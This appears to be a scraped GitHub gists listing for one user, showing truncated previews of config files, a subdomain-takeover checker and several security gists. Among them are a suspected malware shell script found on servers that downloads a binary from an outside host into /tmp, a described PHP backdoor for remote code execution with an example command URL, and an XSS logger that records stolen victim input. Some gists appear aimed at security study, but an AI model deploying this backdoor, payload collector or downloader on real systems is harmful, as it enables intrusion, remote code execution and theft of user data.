Bug report for ..........
-
Install this by this command
apt install example -
Configure this with this
env EXAMPLE=POC -
Run
thisfor exploit
AnikHasibul
/ settings.json
Created
August 5, 2019 03:18
Microsoft termial with wsl first and color scheme
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "globals" : | |
| { | |
| "alwaysShowTabs" : false, | |
| "defaultProfile" : "{2c4de342-38b7-51cf-b940-2309a097f518}", | |
| "initialCols" : 100, | |
| "initialRows" : 25, | |
| "keybindings" : | |
| [ | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* W3.CSS 4.12 November 2018 by Jan Egil and Borge Refsnes */ | |
| html { | |
| box-sizing: border-box | |
| } | |
| *, | |
| *:before, | |
| *:after { | |
| box-sizing: inherit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| header('X-XSS-Protection: 1; mode=block'); | |
| header('X-Content-Type: nosniff'); | |
| header('X-Frame-Options: DENY'); | |
| header('Referrer-Policy: no-referrer-when-downgrade'); | |
| ?> |
AnikHasibul
/ subdomain.py
Created
January 22, 2019 13:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| from bs4 import BeautifulSoup | |
| errorTexts = [ | |
| "The specified bucket does not exit ", | |
| "Repository not found ", | |
| "ERROR\: The request could not be satisfied ", | |
| "There isn't a GitHub Pages site here.", | |
| "Sorry\, this shop is currently unavailable\. ", |
AnikHasibul
/ bug_report_template.md
Last active
December 7, 2018 18:07
This is a simple bug report template in markdown. All the contents have used just for fun. No connection with reality. 🎉
AnikHasibul
/ .gdbinit
Created
December 6, 2018 18:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # set to 1 to have ARM target debugging as default, use the "arm" command to switch inside gdb | |
| set $ARM = 1 | |
| # set to 0 if you have problems with the colorized prompt - reported by Plouj with Ubuntu gdb 7.2 | |
| set $COLOREDPROMPT = 1 | |
| # color the first line of the disassembly - default is green, if you want to change it search for | |
| # SETCOLOR1STLINE and modify it :-) | |
| set $SETCOLOR1STLINE = 0 | |
| # set to 0 to remove display of objectivec messages (default is 1) | |
| set $SHOWOBJECTIVEC = 1 | |
| # set to 0 to remove display of cpu registers (default is 1) |
AnikHasibul
/ maybeAMalware.sh
Last active
November 30, 2018 11:10
Malware or Anti-Malware? Found on various server. What the F is this nanoWatch AKA weaponX?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin | |
| getnanoWatch(){ | |
| ARCH=$(uname -i) | |
| if [ "$ARCH" == "x86_64" ] | |
| then | |
| rm -rf /tmp/nanoWatch* | |
| wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch | |
| if [ $? -ne 0 -a $PS2 -eq 0 ]; | |
| then |
AnikHasibul
/ Tutorial.md
Created
October 22, 2018 11:21
The tiniest PHP malware/backdoor for Remote Code Execution.
https://example.com/backdoor.php?f=syntem&p=ls
The above endpoint will list all the files on the directory! via system(ls);
AnikHasibul
/ xsslogger.php
Created
October 22, 2018 11:16
XSS (Cross Site Scripting) payload for stealing user input from victim site.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND); | |
| header("Access-Control-Allow-Origin: *"); | |
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set rtp+=~/.vim/bundle/Vundle.vim | |
| set shell=/bin/bash | |
| call vundle#begin() | |
| " let Vundle manage Vundle, required | |
| Plugin 'luochen1990/rainbow' | |
| Plugin 'SirVer/ultisnips' | |
| Plugin 'gmarik/Vundle.vim' | |
| Plugin 'AnikHasibul/molokai' | |
| Plugin 'AndrewRadev/splitjoin.vim' |
NewerOlder